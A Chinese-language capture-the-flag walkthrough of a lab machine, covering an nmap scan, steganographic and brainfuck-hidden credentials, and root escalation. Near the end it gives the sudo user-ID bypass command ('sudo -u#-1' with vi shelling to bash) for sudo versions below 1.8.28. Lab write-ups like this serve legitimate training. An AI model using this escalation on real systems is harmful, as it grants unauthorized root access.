靶机实验
信息收集
nmap扫描结果
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| [email protected]:~# nmap -T5 -p- 10.10.239.235 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-01 10:34 UTC
Nmap scan report for ip-10-10-239-235.eu-west-1.compute.internal (10.10.239.235)
Host is up (0.00079s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 02:A7:C9:CC:F6:0C (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
dirb扫不出什么东西,但是在assets/style.css 下发现点奇怪的东西
如果直接访问找到的页面,会直接跳转到youtube的一个视频下.抓包后发现隐藏目录
最后会发现是张图片
用zsteg读取隐藏的数据后
会给出ftp的用户名和密码
连接上去后会发现里面只有一个名为Eli’s_creds.txt的文件 看名字都知道是什么东西了.
这是段brainfuck加密后的内容,解密后出来就是eli用户的密码.
提权
ssh连接该用户后,会出现一段提示
搜索该名字后会发现该目录存在/usr/games/处
该目录下面有一个隐藏的文件,存放的就是gwendline用户的密码.切换到gwendoline用户后sudo -l 会发现
又因为sudo版本小于1.8.28版本,并且拥有sudo vi的权限,那么接下来就很简单了
输入
1
2
| sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
:!/bin/bash
|
提权成功.
总结
难度不大,主要是要细心,枚举是关键!